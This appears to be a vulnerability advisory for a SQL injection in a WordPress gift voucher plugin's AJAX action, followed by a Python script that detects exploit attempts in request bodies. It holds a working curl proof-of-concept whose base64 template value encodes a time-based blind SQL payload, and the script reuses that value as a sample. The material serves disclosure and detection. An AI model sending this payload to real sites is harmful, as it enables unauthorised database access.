The plugin does not properly sanitise and escape the template parameter before using it in a SQL statement via the wpgv_doajax_voucher_pdf_save_func AJAX action, leading to a SQL injection exploitable by any authenticated user, such as a subscriber.
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --data "action=wpgv_doajax_voucher_pdf_save_func&nonce=af77cd5581&template=KENBU0UgV0hFTiAoMTAxNj0xMDE2KSBUSEVOIFNMRUVQKDUpIEVMU0UgMTAxNiBFTkQp&buying_for=&for=&from=&value=&message=&code=&shipping=&shipping_email=&firstname=&lastname=&email=&address=&pincode=&shipping_method=&paymentmethod="
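
A detection check for the request above, as an added example that is not code from the plugin or from the advisory: it decodes the base64 template field of admin-ajax.php POST bodies and flags any value that is not a plain number. That a legitimate template value decodes to a numeric ID is an assumption, and the function names are hypothetical.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

ACTION = "wpgv_doajax_voucher_pdf_save_func"  # AJAX action named in the advisory
NUMERIC_ID = re.compile(r"[0-9]{1,10}")       # assumption: templates are numeric IDs


def classify_template(body: str) -> str:
    """Classify one urlencoded POST body sent to admin-ajax.php.

    Returns 'other-action', 'missing', 'not-base64', 'suspicious' or 'ok'.
    """
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("action", [""])[0] != ACTION:
        return "other-action"
    raw = fields.get("template", [""])[0]
    if not raw:
        return "missing"
    try:
        # Strict decoding: stray characters or bad padding are reported,
        # not silently skipped.
        decoded = base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return "not-base64"
    return "ok" if NUMERIC_ID.fullmatch(decoded) else "suspicious"


def flag_requests(bodies):
    """Return (index, verdict) for every body that needs review."""
    verdicts = ((i, classify_template(b)) for i, b in enumerate(bodies))
    return [(i, v) for i, v in verdicts if v in ("suspicious", "not-base64")]


# Constructed sample bodies; the second reuses the template value from the
# request shown above, the others are made up for this example.
SAMPLE_BODIES = [
    "action=wpgv_doajax_voucher_pdf_save_func&nonce=0000000000&template=MTI%3D&value=50",
    "action=wpgv_doajax_voucher_pdf_save_func&nonce=af77cd5581&template="
    "KENBU0UgV0hFTiAoMTAxNj0xMDE2KSBUSEVOIFNMRUVQKDUpIEVMU0UgMTAxNiBFTkQp&value=",
    "action=wpgv_doajax_voucher_pdf_save_func&nonce=0000000000&template=12%27",
    "action=heartbeat&template=ignored",
]

if __name__ == "__main__":
    for index, verdict in flag_requests(SAMPLE_BODIES):
        print(f"body {index}: {verdict}")
```

The same check can run over captured request bodies from a reverse proxy or WAF log; a "not-base64" verdict is treated as reviewable because a lenient server-side decoder may still accept such input.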